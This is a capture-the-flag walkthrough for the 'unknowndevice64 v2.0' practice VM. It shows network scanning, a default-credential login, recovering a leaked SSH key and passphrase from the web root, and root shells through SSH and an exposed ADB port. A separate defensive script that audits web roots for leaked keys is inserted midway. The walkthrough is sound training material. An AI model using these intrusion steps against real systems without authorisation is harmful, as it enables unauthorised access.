Today we are going to take on another boot2root challenge, "unknowndevice64 v2.0" by Ajay Verma. Our goal is to get root and read flag.txt in at least two different ways.
Download it from here: https://download.vulnhub.com/unknowndevice64/unknowndevice64-V2.0.ova
Difficulty: Beginner
Penetrating Methodology:
Scanning
- Netdiscover
- NMAP
Enumeration
- Web Directory search
- Credential harvesting
Exploiting
- SSH login (1st Method)
- ADB login (2nd Method)
Privilege Escalation
- Exploit sudo rights
Capture the Flag
Walkthrough
Scanning:
Let's start off by scanning the network and identifying host IPs. We can identify our host IP as 192.168.1.22 by using netdiscover. Next, we have to scan this IP using nmap.
Code:
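# discover live hosts on the local network
netdiscover
# scan all TCP ports with version detection, OS detection and default scripts
nmap -p- -A 192.168.1.22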
The result shows that freeciv is running on port 5555, ssh is running on port 6465 and netbus is running on 12345.

First, we tried to open the IP in the browser on port 12345 and were prompted to log in. So, we tried basic credentials in different combinations and succeeded with "Administrator" as the username and "password" as the password.

After logging in, a webpage appeared, but it had nothing of use to us.

Then we tried to access the robots.txt file. We got lucky and found a file named "./info.php" listed inside it.

When we opened this in the browser, we were prompted to download it.

When we opened the downloaded file, we found an SSH private key inside it. So, we copied the text from "BEGIN RSA PRIVATE KEY" to "END RSA PRIVATE KEY" and saved it in a file named "sshkey". Besides this key, we can see "unkn0wnd3vic3-64" at the end of the file; let's save this for now.
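
The leak described above (a private key served from the web root, advertised by robots.txt, with its passphrase stored after the key) can be checked for from the server side. The following shell code is an added example, not part of the original walkthrough; the function names audit_webroot and make_sample, the robots.txt line and all file contents are constructed for illustration.

```shell
#!/bin/sh
# Added example: file contents and function names below are constructed.
KEY_RE='-----BEGIN ([A-Z]+ )?PRIVATE KEY-----'

# audit_webroot DIR prints one finding per line:
#   KEY <file>       a served file contains a PEM private-key header
#   TRAILING <file>  non-blank text follows the END marker (stored passphrase?)
#   ROBOTS <path>    robots.txt names a path that holds a private key
audit_webroot() {
    root=$1
    grep -rlE -e "$KEY_RE" "$root" 2>/dev/null | while IFS= read -r f; do
        rel=${f#"$root"/}
        echo "KEY $rel"
        # The walkthrough's info.php kept the passphrase right after the key.
        if awk '/-----END [A-Z ]*PRIVATE KEY-----/ { seen = 1; next }
                seen && NF { found = 1 }
                END { exit !found }' "$f"; then
            echo "TRAILING $rel"
        fi
    done
    [ -f "$root/robots.txt" ] || return 0
    # robots.txt is world-readable, so every path in it is public knowledge.
    sed -n 's/^[A-Za-z]*[Aa]llow:[[:space:]]*//p' "$root/robots.txt" |
    while IFS= read -r p; do
        p=${p#./}; p=${p#/}
        [ -n "$p" ] && [ -f "$root/$p" ] || continue
        if grep -qE -e "$KEY_RE" "$root/$p"; then echo "ROBOTS $p"; fi
    done
    return 0
}

# make_sample builds a constructed web root mirroring the layout described.
make_sample() {
    d=$(mktemp -d)
    printf 'User-agent: *\nDisallow: ./info.php\n' > "$d/robots.txt"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
        'CONSTRUCTED-PLACEHOLDER-NOT-KEY-MATERIAL' \
        '-----END RSA PRIVATE KEY-----' '' 'placeholder-passphrase' > "$d/info.php"
    printf '<html>ok</html>\n' > "$d/index.html"
    echo "$d"
}

sample=$(make_sample)
audit_webroot "$sample"   # KEY, TRAILING and ROBOTS findings for info.php
rm -rf "$sample"
```

Any KEY finding means key material is being served and should be rotated; a TRAILING finding means the passphrase protecting it may be exposed in the same file.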

Here, we first changed the permissions of the file "sshkey". Then we logged in over SSH using this file on port 6465 (as ssh is running on port 6465). We were asked to enter a passphrase for this SSH key, so we used the text "unkn0wnd3vic3-64" that we saved from info.php, and it worked. After that, we switched to the root user and listed the contents of root.
Code:
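# ssh refuses private keys that are readable by other users
chmod 600 sshkey
# sshd listens on the non-standard port 6465
ssh -i sshkey 192.168.1.22 -p 6465
# inside the session: switch to root and list the directory
su root
ls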
We spotted a directory named "system" and inside system, we found a file "flag.txt". This is our flag!

Another way
We will be using previously gained information to save time. As we knew from the Nmap scan that freeciv is running on port 5555, we tried to connect to it with adb. After getting a shell, we switched to root and captured the flag (as we already knew the flag is inside flag.txt within the system directory).
Code:
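# connect to the ADB daemon listening on TCP port 5555
adb connect 192.168.1.22:5555
adb shell
# inside the device shell: switch to root and read the flag
su root
cat system/flag.txt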
Finally!! The challenge is completed, and we have grabbed the flag.txt file using two different approaches.

Author: Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Ignite Technologies as a Security Analyst.